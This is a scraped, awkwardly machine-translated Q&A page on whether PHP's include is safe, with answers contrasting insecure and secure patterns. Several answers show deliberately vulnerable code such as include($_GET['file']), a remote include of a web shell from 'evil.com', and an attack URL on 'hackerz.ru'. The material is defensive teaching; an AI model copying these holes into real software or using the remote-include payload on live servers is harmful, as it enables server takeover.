Geek Answers Handbook

PHP - enable function enable?

I use the include function (ex "include 'header2.php'" or "include" class.users.php '") to add a header or session class on my website. I really don’t remember where, but I heard that hackers somehow abuse this “inclusion” by sending a fake page or something like that, so basically I would like to know what is “enable” with this function, how can I protect it, how do they abuse it, and if there are better solutions for what I'm looking for.

Thanks in advance.

+7
source share
8 answers

It all depends on how you implement it. If you specifically set the path, then it is protected. An attack can occur if you allow the user to enter the file path without disinfection or verification.

Unprotected (directory traversal)

<?php include($_GET['file']); ?>

Insecure ( fopen URL - if enabled)

 <?php include('http://evil.com/c99shell.php'); ?>

unsafe

 <?php include('./some_dir/' . $_GET['file']); ?>

Partly unsafe (* .php files are vulnerable)

 <?php include('./some_dir/' . $_GET['file'] . '.php'); ?>

Secure (although not sure why anyone would.)

 <?php $allowed = array( 'somefile.php', 'someotherfile.php' ); if (in_array(basename($_GET['file']), $allowed)) { include('./includes/' . basename($_GET['file'])); } ?>

Secure

 <?php include('./includes/somefile.php'); ?>
+15
source

The biggest inclusion issue is likely to change the file name extension from PHP to something that is not automatically executed by the web server. For example, library.inc or config.inc. Calling these files using a web browser will show the code instead of executing it - and any passwords or available hints will be displayed.

Compare config.php , which can have a password with config.inc . In most cases, pulling config.inc will show what the database password is.

There are programmers who use the .inc extension for libraries. The premise is that they will not be in a directory accessible by the web server. However, smaller paranoid programmers can dump this file into a convenient web directory.

Otherwise, make sure that you did not include the file that was sent using the query string in any way. Example: include( $_GET['menu_file'] ) <- this is very wrong.

+3
source

Include can be abused if you do something like this:

 include($_GET["page"]);

and then call the url:

myscript.php?page=index.php

attackers can then replace index.php with hxxp://hackerz.ru/install_stuff.php , and your server will happily launch it.

include itself is completely safe. Just make sure you always check / avoid input.

+2
source

Any server side (provided that your server is not compromised) is safe. Performing this action:

 $var = $_GET['var']'; include $var . ".php";

unsafe.

 include "page.php";

is safe.

+2
source

Enable safely if you do not:

  • Include a remote file, for example www.someoneelsesssite.com/something.php
  • Include the file from the path that came from the client. www.mysite.com/bad.php?path=oops/here/is/your/passwords/file
  • Include a file from another, possibly corrupted source, such as a database.

2 and 3 technically have the reservation that if you prohibit . and / or on windows \ you are likely to be fine. But if you do not know why, you do not know enough about it to take risks. Even if you think that the database is read-only or otherwise secure, it’s prudent not to assume that if you really don't need that, almost never.

As pp19dd points out the answer. It is also important that you name your extensions with the .php extension. If you installed apache (or some other web server that you use) to parse another type of file like PHP, this is also safe. But if you do not know for sure, use .php exclusively.

+1
source

It’s best to make sure that the page you are trying to include first exists. Real security loopholes come when your inclusion page is processed from some kind of user input, such as a URL variable. ?include=page.php While you are careful, you should be fine.

 if(is_file($file)) { //other code, such as user verification and such should also go here include $file; } else { die(); }
+1
source

Not! The include () function is NOT safe. Without looking at a single line of code, consider the following: include () still allows your script to move around even if the file does not load. He will continue to work with a warning. So, this extends the attack vector of your php script for a smart attacker.

In modern application design, why should file inclusion be optional? If your application is not whole, you want it to fail!

0
source

I am using this method.

 <?php include (dirname(__FILE__).'/file.php');
-one
source

More articles:


All Articles